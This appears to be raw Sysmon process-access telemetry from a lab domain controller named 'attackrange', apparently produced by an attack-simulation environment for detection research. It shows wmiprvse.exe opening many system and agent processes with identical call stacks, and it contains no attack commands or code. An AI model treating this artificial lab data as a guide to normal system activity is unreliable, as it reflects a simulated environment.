1bc 10341000x800000000000000027083Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027082Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027081Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027080Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027079Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027078Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027077Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027076Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027075Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027074Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027073Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027072Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027071Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027070Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027069Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027068Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027067Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027066Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027065Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027064Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:40.959{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027063Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 